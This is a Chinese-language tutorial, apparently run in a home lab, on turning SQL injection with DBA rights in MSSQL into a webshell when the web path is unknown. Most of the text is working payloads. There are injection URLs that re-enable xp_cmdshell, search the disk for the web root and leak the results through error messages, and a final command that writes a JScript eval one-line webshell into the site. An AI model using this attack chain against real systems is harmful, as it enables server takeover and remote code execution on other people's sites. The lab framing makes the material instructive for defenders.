MSSQL DBA權限獲取WEBSHELL的過程

前言

本文主要通過一個案例來演示一下當MSSQL是DBA權限，且不知道路徑的時候如何去獲取WEBSHELL。當然這種方式對站庫分離的無效。
我測試的環境是在Win7 64位下，數據庫是SQLServer 2000，IIS版本是7.5，程序是采用風訊的CMS。后台登錄后有多處注入，因為這里是演示用注入獲取WEBSHELL，因此就不考慮后台上傳的情況了，只是用注入來實現。

過程

首先找到一個如下的注入點：

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1' and 1=user;--

通過SQLMAP可以查看到是DBA權限

創建臨時表

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';CREATE TABLE tt_tmp (tmp1 varchar(8000));--

在WINDOWS下查找文件用如下命令：

for /r 目錄名:\ %i in (匹配模式) do @echo %i

例如在C盤下搜索NewsList.aspx，可以使用for /r c:\ %i in (Newslist*.aspx) do @echo %i或者for /r c:\ %i in (Newslist.aspx*) do @echo %i

使用for /r c:\ %i in (Newslist*.aspx) do @echo %i的搜索結果

一定要在匹配模式里面加上一個*號，不然搜索出來的是全部的目錄，后面拼接了你搜索的內容。
使用for /r c:\ %i in (Newslist.aspx) do @echo %i的搜索結果

用xp_cmdshell執行查找文件的命令，並將搜索的結果插入到臨時表中

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';insert into tt_tmp(tmp1) exec master..xp_cmdshell 'for /r c:\ %i in (Newslist*.aspx) do @echo %i ';--

如果無法執行xp_cmdshell，並提示如下錯誤SQL Server阻止了對組件‘xp_cmdshell’的過程‘sys.xp_cmdshell’的訪問。因為此組件已作為此服務囂安全配置的一部分而被關閉。系統管理員可以通過使用sp_configure啟用‘xp_cmdshell’。

可以使用如下命令來啟用xp_cmdshell

;EXEC sp_configure 'show advanced options',1;//允許修改高級參數
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; //打開xp_cmdshell擴展
RECONFIGURE;--

然后再次執行搜索命令。

在執行上述搜索和插入過程后，可以使用' and (select(*) from tt_tmp)>1頁面返回是否正常來判斷是否有搜索結果。當沒有找到的話，select(*) from tt_tmp的結果為1，否則大於1。如果沒有的話，就換目錄，可以試試其他盤符，如';insert into tt_tmp(tmp1) exec master..xp_cmdshell 'for /r d:\ %i in (Newslist*.aspx) do @echo %i ';--。也可以使用sqlmap來查看條數。

可以用報錯將表內容給顯示出來

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=2' and 1=(select top 1 tmp1 from tt_tmp)and 'a'='a

 

繼續爆

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=2' and 1=(select top 1 tmp1 from tt_tmp where tmp1 not in ('c:\inetpub\wwwroot\manage\news\NewsList.aspx '))and 'a'='a

 

也可以用sqlmap直接將表中數據讀取出來

然后根據導出結果的路徑來判斷是否可能為WEB目錄。然后寫入一個測試文件，看是否可以訪問來進一步證實結果。

這里在根目錄寫了一個txt文件，寫別的目錄怕因為沒有權限而無法訪問。

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';exec master..xp_cmdshell 'echo test >c:\\WWW\\2333.txt';--

然后訪問http://192.168.232.138:81/2333.txt

成功訪問，然后就是寫一句話

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\WWW\\233.aspx' ;--

DOS命令將文件寫入文本中時，遇到<>應在前面加上^。成功寫入。然后就是進一步的操作了，這里就不概述了。

總結:

這里一共有三個小的知識點:
1.sa用戶如何開啟xp_cmdshell

EXEC sp_configure 'show advanced options',1;//允許修改高級參數
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; //打開xp_cmdshell擴展
RECONFIGURE;

2.Windows下利用dos如何搜索文件 

for /r c:\ %i in (Newslist*.aspx) do @echo %i
for /r c:\ %i in (Newslist.aspx*) do @echo %i

3.dos命令下寫文件遇到<>如何處理 

echo ^<^> > 123.txt

 

 

參考:

[1]Windows命令行(cmd)下快速查找文件(類似Linux下find命令) 
[2]技術分享：MSSQL注入xp_cmdshell